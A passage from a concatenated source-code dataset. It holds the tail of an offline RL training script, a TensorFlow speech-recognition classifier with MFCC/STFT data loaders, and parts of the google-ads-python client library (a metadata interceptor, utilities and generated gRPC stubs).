batch_obs, batch_action, batch_reward, batch_next_obs,
batch_terminal)
tensorboard.add_scalar('train/critic_loss', critic_loss, total_steps)
tensorboard.add_scalar('train/value_loss', value_loss, total_steps)
tensorboard.add_scalar('train/actor_loss', actor_loss, total_steps)
# Evaluate episode
if total_steps // args.test_every_steps >= test_flag:
while total_steps // args.test_every_steps >= test_flag:
test_flag += 1
avg_reward, eval_rewards = run_evaluate_episodes(
agent, env, EVAL_EPISODES)
normalized_returns = d4rl.get_normalized_score(
args.env, eval_rewards) * 100
normalized_mean = normalized_returns.mean()
tensorboard.add_scalar('eval/episode_reward', avg_reward,
total_steps)
tensorboard.add_scalar('eval/episode_normalized_reward',
normalized_mean, total_steps)
logger.info('Evaluation: total_steps {}, Reward: {}'.format(
total_steps, avg_reward))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--env",
default="hopper-medium-v2",
help='Mujoco gym environment name in d4rl')
parser.add_argument(
"--seed",
default=60,
type=int,
help='Sets Gym, PyTorch and Numpy seeds')
parser.add_argument(
"--train_total_steps",
default=int(1e6),
type=int,
help='Max time steps to run environment')
parser.add_argument(
'--test_every_steps',
type=int,
default=int(5e3),
help='The step interval between two consecutive evaluations')
args = parser.parse_args()
logger.info(args)
main()
``` |
{
"source": "Jiukaishi/Speech-recognition-using-MFCC-STFT-and-Mixed-feature",
"score": 2
} |
#### File: Jiukaishi/Speech-recognition-using-MFCC-STFT-and-Mixed-feature/ANN.py
```python
import numpy as np
from Dataprocess import load_extra_data, DNN_get_data
import tensorflow as tf
import copy
import matplotlib.pyplot as plt
import pickle
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
#########hyper parameters############
learning_rate = 0.02
Frame_number = 25
Feature_number = 13
commitynumber = 16
batch_size = 32 # len(tags)
EPOCHTIMES = 600 # 600
#################################
networks = []
accuracies = []
cms = []
class Nerual_Networks():
def __init__(self, frame_number=Frame_number,
feature_number=Feature_number,
time_input=1,
name="adam",
network_type="mse",
trainable=True,
lr=learning_rate,
model_file=None):
self.n_features = 10
self.network_type = network_type
self.times_input = 1
self.learning_rate = lr
self.name = name
# -------------- Network --------------
with tf.variable_scope(self.name):
# ------------------------- MLP -------------------------
# MLP network
if 1:
self.obs_action = tf.placeholder(tf.float32, shape=[None, feature_number * frame_number])
self.iftraining = tf.placeholder(tf.bool, None)
self.f1 = tf.layers.dense(inputs=self.obs_action, units=8, activation=tf.nn.relu,
kernel_initializer=tf.random_normal_initializer(mean=0, stddev=0.1),
bias_initializer=tf.constant_initializer(0.1),
trainable=trainable)
self.f3 = tf.layers.dense(inputs=self.f1, units=8, activation=tf.nn.relu,
kernel_initializer=tf.random_normal_initializer(mean=0, stddev=0.1),
bias_initializer=tf.constant_initializer(0.1),
trainable=trainable)
self.predict = tf.layers.dense(inputs=self.f3, units=self.n_features, trainable=trainable)
# -------------- Label --------------
if network_type == 'mse':
self.correct_labels = tf.placeholder(tf.int32, [None])
self.labels = tf.one_hot(self.correct_labels, 10)
# define the loss function
self.square = tf.square(self.predict - self.labels)
self.cross_entropy_mean = tf.reduce_mean(self.square, name='mse')
# -------------- Train --------------
self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.cross_entropy_mean)
elif network_type == 'cross_entropy':
self.correct_labels = tf.placeholder(tf.int32, [None])
self.cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.predict,
labels=self.correct_labels)
# define the loss function
self.cross_entropy_mean = tf.reduce_mean(self.cross_entropy, name='cross_entropy')
# -------------- Train --------------
self.train_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.cross_entropy_mean)
# -------------- Sess --------------
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
# -------------- Saver --------------
self.saver = tf.train.Saver()
if model_file is not None:
self.restore_model(model_file)
# Output information
print("================ Build Neural Network ================")
# Learn the model
def learn(self, batch_features, batch_labels):
batch_labels = batch_labels.reshape([-1])
_, loss = self.sess.run([self.train_op, self.cross_entropy_mean], feed_dict={self.obs_action: batch_features,
self.correct_labels: batch_labels,
self.iftraining: True})
return loss
def test(self, correct_label, data):
batch_predictions = tf.cast(tf.argmax(self.predict, 1), tf.int32)
predicted_correctly = tf.equal(batch_predictions, correct_label)
accuracy = tf.reduce_mean(tf.cast(predicted_correctly, tf.float32))
return self.sess.run(accuracy, feed_dict={self.obs_action: data, self.iftraining: False})
def pred(self, data):
batch_predictions = tf.cast(tf.argmax(self.predict, 1), tf.int32)
return self.sess.run(batch_predictions, feed_dict={self.obs_action: data, self.iftraining: False})
# define the model-saving function
def save_model(self, model_path):
self.saver.save(self.sess, model_path)
# define the model-restoring function
def restore_model(self, model_path):
self.saver.restore(self.sess, model_path)
if __name__ == '__main__':
# unwrap the environment
optimizer_type = ['mse', 'cross_entropy']
losses = [[], []]
accus = [[], []]
for i in range(2):
nn = Nerual_Networks(name=str(i), network_type=optimizer_type[i])
# create a new network object
tags, data = DNN_get_data('SC_MFCC.mat')
# load the data
data, testdata, tags, testtags = train_test_split(data, tags, test_size=0.2, random_state=1)
# split into training and test sets
Epochtimes = EPOCHTIMES
batchsize = len(tags)
temp_accuracy = 0
for k in range(Epochtimes):
loss = 0
perm = np.random.permutation(len(tags))
for j in range(len(tags) // batchsize):
start = j * batchsize
end = (j + 1) * batchsize
loss += nn.learn(batch_features=copy.deepcopy(data[start:end].reshape([-1, 25 * 13])),
batch_labels=copy.deepcopy(tags[start:end].reshape([-1, 1])))
if (k + 1) % 100 == 0:
print('total loss', loss / len(tags))
losses[i].append(loss / len(tags))
if (k + 1) % 100 == 0:
accuracy = nn.test(correct_label=testtags, data=testdata)
# temp_accuracy = accuracy
print('accuracy is', round(accuracy, 3))
accus[i].append(round(accuracy, 3))
preds = nn.pred(data=testdata)
cm = confusion_matrix(testtags, preds)
print(cm)
nn.save_model('./models')
networks.append(nn)
plt.plot(losses[0], label='mse')
plt.plot(losses[1], label='cross entropy+softmax')
# plt.plot(losses[2], label='MOMENTUM')
plt.xlabel('epochs', fontsize=16)
plt.ylabel('loss', fontsize=16)
plt.legend()
plt.savefig('./experiments images/mse_crossentropy_compare_loss.png')
plt.clf()
plt.plot(accus[0], label='mse')
plt.plot(accus[1], label='cross entropy+softmax')
plt.xlabel('epochs', fontsize=25)
plt.ylabel('accuracies', fontsize=16)
plt.legend()
plt.savefig('./experiments images/mse_crossentropy_compare_accuracy.png')
plt.clf()
```
#### File: Jiukaishi/Speech-recognition-using-MFCC-STFT-and-Mixed-feature/Dataprocess.py
```python
import numpy as np
import scipy.io
import copy
#generating STFT feature
def get_stft_data(path = 'SE_STFT.mat'):
data = scipy.io.loadmat(path)
data = np.array(data['DB'])
tags = data[:, 0]
tags.astype(int)
data = data[:, 1:]
newdata = np.zeros([len(data), 25, 13])
for i in range(len(data)):
newdata[i] = copy.deepcopy(data[i].reshape([25,13]))
print('=============Successfully generate CNN data==========')
return tags, newdata
#generating MFCC feature
def get_data(path = 'SE_MFCC.mat'):
data = scipy.io.loadmat(path)
# key = path.split('_')[2][0:3]
data = np.array(data['DB'])
tags = data[:, 0]
tags.astype(int)
data = data[:, 1:]
newdata = np.zeros([len(data), 25, 13])
for i in range(len(data)):
newdata[i] = copy.deepcopy(data[i].reshape([13, 25]).T)
newdata.reshape([-1, 325])
print('=============Successfully generate CNN data==========')
return tags, newdata
#generating mixed feature
def get_moredata(path='SE_MFCC.mat'):
data = scipy.io.loadmat(path)
stft = scipy.io.loadmat('SE_STFT.mat')
data = np.array(data['DB'])
stft = np.array(stft['DB'])
tags = data[:, 0]
tags.astype(int)
data = data[:, 1:]
stft = stft[:, 1:]
newdata = np.zeros([len(data), 25, 13])
stft_data= np.zeros([len(stft), 25, 13])
hybrid_data = np.zeros([len(stft), 25, 26])
for i in range(len(data)):
newdata[i] = copy.deepcopy(data[i].reshape([13, 25]).T)
for i in range(len(stft)):
stft_data[i] = copy.deepcopy(stft[i].reshape([25, 13]))
for i in range(len(newdata)):
a= newdata[i]
b=stft_data[i]
c = np.hstack((a, b))
hybrid_data[i] = c
print('=============Successfully generate CNN data==========')
return tags, hybrid_data
# calculate the differential data (the difference between two adjacent vectors)
def differential_data(path = 'SE_MFCC.mat'):
data = scipy.io.loadmat(path)
#key = path.split('_')[2][0:3]
data = np.array(data['DB'])
tags = data[:,0]
tags.astype(int)
data = data[:,1:]
newdata = np.zeros([len(data), 25, 13])
for i in range(len(data)):
newdata[i] = copy.deepcopy(data[i].reshape([13, 25]).T)
diff_data = np.zeros([len(data), 312])
for i in range(len(data)):
for j in range(len(newdata[0])-1):
newdata[i][j] = (copy.deepcopy(newdata[i][j+1] - newdata[i][j]))
diff_data[i] = newdata[i][:24].reshape([312])
for i in range(len(data)):
diff_data[i] = copy.deepcopy(diff_data[i].reshape([312]))
print('=============Successfully generate differential data==========')
return tags,diff_data
# generate one-dimensional MFCC data for the ANN
def DNN_get_data(path = 'SE_MFCC.mat'):
data = scipy.io.loadmat(path)
#key = path.split('_')[2][0:3]
data = np.array(data['DB'])
tags = data[:,0]
tags.astype(int)
data = data[:,1:]
return tags,data
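# Illustrative usage (a sketch; the 325 = 25 frames x 13 coefficients feature
# width is inferred from how ANN.py reshapes the data and is an assumption):
#   tags, data = DNN_get_data('SC_MFCC.mat')   # data: (n_samples, 325)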
# generate one-dimensional STFT data for the ANN
def DNN_get_stft_data(path = 'SE_STFT.mat'):
data = scipy.io.loadmat(path)
#key = path.split('_')[2][0:3]
data = np.array(data['DB'])
tags = data[:,0]
tags.astype(int)
data = data[:,1:]
return tags,data
# generate mixed one-dimensional data for the ANN
def load_extra_data(path='SE_MFCC.mat'):
data = scipy.io.loadmat(path)
STFT_DATA = scipy.io.loadmat('SE_STFT.mat')
data = np.array(data['DB'])
STFT_DATA = np.array(STFT_DATA['DB'])
tags = data[:,0]
tags.astype(int)
stft_tags = STFT_DATA[:,0]
stft_data = STFT_DATA[:,1:]
data = data[:,1:]
data = np.hstack((data, stft_data))
return tags,data
# def load_diff_MFCC_data(path='SE_MFCC.mat'):
# data = scipy.io.loadmat(path)
# STFT_DATA = scipy.io.loadmat('SE_STFT.mat')
# data = np.array(data['DB'])
# STFT_DATA = np.array(STFT_DATA['DB'])
# tags = data[:,0]
# tags.astype(int)
# stft_tags = STFT_DATA[:,0]
# stft_data = STFT_DATA[:,1:]
# _, diff_data = differential_data()
# data = data[:,1:]
# data = np.hstack((data, diff_data))
# return tags,data
``` |
{
"source": "jiulongw/google-ads-python",
"score": 2
} |
#### File: google_ads/interceptors/metadata_interceptor.py
```python
from grpc import UnaryUnaryClientInterceptor
from .interceptor_mixin import InterceptorMixin
class MetadataInterceptor(InterceptorMixin, UnaryUnaryClientInterceptor):
"""An interceptor that appends custom metadata to requests."""
def __init__(self, developer_token, login_customer_id):
self.developer_token_meta = ('developer-token', developer_token)
self.login_customer_id_meta = (
('login-customer-id', login_customer_id) if login_customer_id
else None)
def _update_client_call_details_metadata(self, client_call_details,
metadata):
"""Updates the client call details with additional metadata.
Args:
client_call_details: An instance of grpc.ClientCallDetails.
metadata: Additional metadata defined by GoogleAdsClient.
Returns:
A new instance of grpc.ClientCallDetails with additional metadata
from the GoogleAdsClient.
"""
client_call_details = self.get_client_call_details_instance(
client_call_details.method, client_call_details.timeout, metadata,
client_call_details.credentials)
return client_call_details
def intercept_unary_unary(self, continuation, client_call_details, request):
"""Intercepts and appends custom metadata.
Overrides abstract method defined in grpc.UnaryUnaryClientInterceptor.
Returns:
A grpc.Call/grpc.Future instance representing a service response.
"""
if client_call_details.metadata is None:
metadata = []
else:
metadata = list(client_call_details.metadata)
metadata.append(self.developer_token_meta)
if self.login_customer_id_meta:
metadata.append(self.login_customer_id_meta)
client_call_details = self._update_client_call_details_metadata(
client_call_details,
metadata)
return continuation(client_call_details, request)
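# Illustrative usage (a sketch with placeholder values, not part of this
# module): the interceptor is attached to an existing gRPC channel, e.g.
#   interceptor = MetadataInterceptor('INSERT_DEVELOPER_TOKEN', '1234567890')
#   channel = grpc.intercept_channel(channel, interceptor)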
```
#### File: ads/google_ads/util.py
```python
import functools
import re
# This regex matches lowercase characters preceded by the start of the string or an underscore.
_RE_FIND_CHARS_TO_UPPERCASE = re.compile(r'(?:_|^)([a-z])')
class ResourceName:
# As of Google Ads API v1 composite resource names are
# delimited by a "~" character.
_COMPOSITE_DELIMITER = '~'
@classmethod
def format_composite(cls, *arg):
"""Formats any number of ID strings into a single composite string.
Note: this utility does not construct an entire resource name string.
It only formats the composite portion for IDs that are not globally
unique, for example an ad_group_ad.
Args:
arg: Any number of str IDs for resources such as ad_groups or
ad_group_ads.
Returns:
A str of all the given strs concatenated with the composite
delimiter.
Raises:
TypeError: If anything other than a string is passed in.
"""
return cls._COMPOSITE_DELIMITER.join(arg)
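# Illustrative example (the IDs are placeholders):
#   ResourceName.format_composite('12345', '67890')  # -> '12345~67890'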
def get_nested_attr(obj, attr, *args):
"""Gets the value of a nested attribute from an object.
Args:
obj: an object to retrieve an attribute value from.
attr: a string of the attribute separated by dots.
Returns:
The object attribute value or the given *args if the attr isn't present.
"""
def _getattr(obj, attr):
return getattr(obj, attr, *args)
return functools.reduce(_getattr, [obj] + attr.split('.'))
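# Illustrative example (`row` is a hypothetical object, not defined here):
#   get_nested_attr(row, 'campaign.id', None)  # row.campaign.id, or None if absent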
def convert_upper_case_to_snake_case(string):
"""Converts a string from UpperCase to snake_case.
Primarily used to translate module names when retrieving them from version
modules' __init__.py files.
Args:
string: an arbitrary string to convert.
"""
new_string = ''
index = 0
for char in string:
if index == 0:
new_string += char.lower()
elif char.isupper():
new_string += f'_{char.lower()}'
else:
new_string += char
index += 1
return new_string
def convert_snake_case_to_upper_case(string):
"""Converts a string from snake_case to UpperCase.
Primarily used to translate module names when retrieving them from version
modules' __init__.py files.
Args:
string: an arbitrary string to convert.
"""
def converter(match):
"""Convert a string to strip underscores then uppercase it."""
return match.group().replace('_', '').upper()
return _RE_FIND_CHARS_TO_UPPERCASE.sub(converter, string)
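# Illustrative examples (the module name is a placeholder):
#   convert_upper_case_to_snake_case('CampaignBudgetService')    # -> 'campaign_budget_service'
#   convert_snake_case_to_upper_case('campaign_budget_service')  # -> 'CampaignBudgetService'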
```
#### File: proto/services/campaign_audience_view_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import campaign_audience_view_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__audience__view__pb2
from google.ads.google_ads.v1.proto.services import campaign_audience_view_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__audience__view__service__pb2
class CampaignAudienceViewServiceStub(object):
"""Proto file describing the Campaign Audience View service.
Service to manage campaign audience views.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCampaignAudienceView = channel.unary_unary(
'/google.ads.googleads.v1.services.CampaignAudienceViewService/GetCampaignAudienceView',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__audience__view__service__pb2.GetCampaignAudienceViewRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__audience__view__pb2.CampaignAudienceView.FromString,
)
class CampaignAudienceViewServiceServicer(object):
"""Proto file describing the Campaign Audience View service.
Service to manage campaign audience views.
"""
def GetCampaignAudienceView(self, request, context):
"""Returns the requested campaign audience view in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CampaignAudienceViewServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCampaignAudienceView': grpc.unary_unary_rpc_method_handler(
servicer.GetCampaignAudienceView,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__audience__view__service__pb2.GetCampaignAudienceViewRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__audience__view__pb2.CampaignAudienceView.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.CampaignAudienceViewService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
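# Illustrative server wiring (a sketch; `MyServicer` and the port are
# assumptions, not part of the generated module):
#   from concurrent import futures
#   server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
#   add_CampaignAudienceViewServiceServicer_to_server(MyServicer(), server)
#   server.add_insecure_port('[::]:50051')
#   server.start()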
```
#### File: proto/services/campaign_bid_modifier_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import campaign_bid_modifier_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__bid__modifier__pb2
from google.ads.google_ads.v1.proto.services import campaign_bid_modifier_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2
class CampaignBidModifierServiceStub(object):
"""Proto file describing the Campaign Bid Modifier service.
Service to manage campaign bid modifiers.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCampaignBidModifier = channel.unary_unary(
'/google.ads.googleads.v1.services.CampaignBidModifierService/GetCampaignBidModifier',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.GetCampaignBidModifierRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__bid__modifier__pb2.CampaignBidModifier.FromString,
)
self.MutateCampaignBidModifiers = channel.unary_unary(
'/google.ads.googleads.v1.services.CampaignBidModifierService/MutateCampaignBidModifiers',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.MutateCampaignBidModifiersRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.MutateCampaignBidModifiersResponse.FromString,
)
class CampaignBidModifierServiceServicer(object):
"""Proto file describing the Campaign Bid Modifier service.
Service to manage campaign bid modifiers.
"""
def GetCampaignBidModifier(self, request, context):
"""Returns the requested campaign bid modifier in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateCampaignBidModifiers(self, request, context):
"""Creates, updates, or removes campaign bid modifiers.
Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CampaignBidModifierServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCampaignBidModifier': grpc.unary_unary_rpc_method_handler(
servicer.GetCampaignBidModifier,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.GetCampaignBidModifierRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_campaign__bid__modifier__pb2.CampaignBidModifier.SerializeToString,
),
'MutateCampaignBidModifiers': grpc.unary_unary_rpc_method_handler(
servicer.MutateCampaignBidModifiers,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.MutateCampaignBidModifiersRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_campaign__bid__modifier__service__pb2.MutateCampaignBidModifiersResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.CampaignBidModifierService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/customer_negative_criterion_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import customer_negative_criterion_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_customer__negative__criterion__pb2
from google.ads.google_ads.v1.proto.services import customer_negative_criterion_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2
class CustomerNegativeCriterionServiceStub(object):
"""Proto file describing the Customer Negative Criterion service.
Service to manage customer negative criteria.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetCustomerNegativeCriterion = channel.unary_unary(
'/google.ads.googleads.v1.services.CustomerNegativeCriterionService/GetCustomerNegativeCriterion',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.GetCustomerNegativeCriterionRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_customer__negative__criterion__pb2.CustomerNegativeCriterion.FromString,
)
self.MutateCustomerNegativeCriteria = channel.unary_unary(
'/google.ads.googleads.v1.services.CustomerNegativeCriterionService/MutateCustomerNegativeCriteria',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.MutateCustomerNegativeCriteriaRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.MutateCustomerNegativeCriteriaResponse.FromString,
)
class CustomerNegativeCriterionServiceServicer(object):
"""Proto file describing the Customer Negative Criterion service.
Service to manage customer negative criteria.
"""
def GetCustomerNegativeCriterion(self, request, context):
"""Returns the requested criterion in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateCustomerNegativeCriteria(self, request, context):
"""Creates or removes criteria. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CustomerNegativeCriterionServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetCustomerNegativeCriterion': grpc.unary_unary_rpc_method_handler(
servicer.GetCustomerNegativeCriterion,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.GetCustomerNegativeCriterionRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_customer__negative__criterion__pb2.CustomerNegativeCriterion.SerializeToString,
),
'MutateCustomerNegativeCriteria': grpc.unary_unary_rpc_method_handler(
servicer.MutateCustomerNegativeCriteria,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.MutateCustomerNegativeCriteriaRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_customer__negative__criterion__service__pb2.MutateCustomerNegativeCriteriaResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.CustomerNegativeCriterionService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/media_file_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import media_file_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_media__file__pb2
from google.ads.google_ads.v1.proto.services import media_file_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2
class MediaFileServiceStub(object):
"""Proto file describing the Media File service.
Service to manage media files.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetMediaFile = channel.unary_unary(
'/google.ads.googleads.v1.services.MediaFileService/GetMediaFile',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.GetMediaFileRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_media__file__pb2.MediaFile.FromString,
)
self.MutateMediaFiles = channel.unary_unary(
'/google.ads.googleads.v1.services.MediaFileService/MutateMediaFiles',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesResponse.FromString,
)
class MediaFileServiceServicer(object):
"""Proto file describing the Media File service.
Service to manage media files.
"""
def GetMediaFile(self, request, context):
"""Returns the requested media file in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateMediaFiles(self, request, context):
"""Creates media files. Operation statuses are returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MediaFileServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetMediaFile': grpc.unary_unary_rpc_method_handler(
servicer.GetMediaFile,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.GetMediaFileRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_media__file__pb2.MediaFile.SerializeToString,
),
'MutateMediaFiles': grpc.unary_unary_rpc_method_handler(
servicer.MutateMediaFiles,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_media__file__service__pb2.MutateMediaFilesResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.MediaFileService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/recommendation_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import recommendation_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_recommendation__pb2
from google.ads.google_ads.v1.proto.services import recommendation_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2
class RecommendationServiceStub(object):
"""Proto file describing the Recommendation service.
Service to manage recommendations.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetRecommendation = channel.unary_unary(
'/google.ads.googleads.v1.services.RecommendationService/GetRecommendation',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.GetRecommendationRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_recommendation__pb2.Recommendation.FromString,
)
self.ApplyRecommendation = channel.unary_unary(
'/google.ads.googleads.v1.services.RecommendationService/ApplyRecommendation',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.ApplyRecommendationRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.ApplyRecommendationResponse.FromString,
)
self.DismissRecommendation = channel.unary_unary(
'/google.ads.googleads.v1.services.RecommendationService/DismissRecommendation',
request_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.DismissRecommendationRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.DismissRecommendationResponse.FromString,
)
class RecommendationServiceServicer(object):
"""Proto file describing the Recommendation service.
Service to manage recommendations.
"""
def GetRecommendation(self, request, context):
"""Returns the requested recommendation in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ApplyRecommendation(self, request, context):
"""Applies given recommendations with corresponding apply parameters.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DismissRecommendation(self, request, context):
"""Dismisses given recommendations.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_RecommendationServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetRecommendation': grpc.unary_unary_rpc_method_handler(
servicer.GetRecommendation,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.GetRecommendationRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_recommendation__pb2.Recommendation.SerializeToString,
),
'ApplyRecommendation': grpc.unary_unary_rpc_method_handler(
servicer.ApplyRecommendation,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.ApplyRecommendationRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.ApplyRecommendationResponse.SerializeToString,
),
'DismissRecommendation': grpc.unary_unary_rpc_method_handler(
servicer.DismissRecommendation,
request_deserializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.DismissRecommendationRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_recommendation__service__pb2.DismissRecommendationResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v1.services.RecommendationService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
```
#### File: proto/services/shared_set_service_pb2_grpc.py
```python
import grpc
from google.ads.google_ads.v1.proto.resources import shared_set_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_resources_dot_shared__set__pb2
from google.ads.google_ads.v1.proto.services import shared_set_service_pb2 as google_dot_ads_dot_googleads__v1_dot_proto_dot_services_dot_shared__set__service__pb2
class SharedSetServiceStub(object):
"""Proto file describing the Shared Set service.
Service to manage shared sets.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetSharedSet = channel.unary_unary(
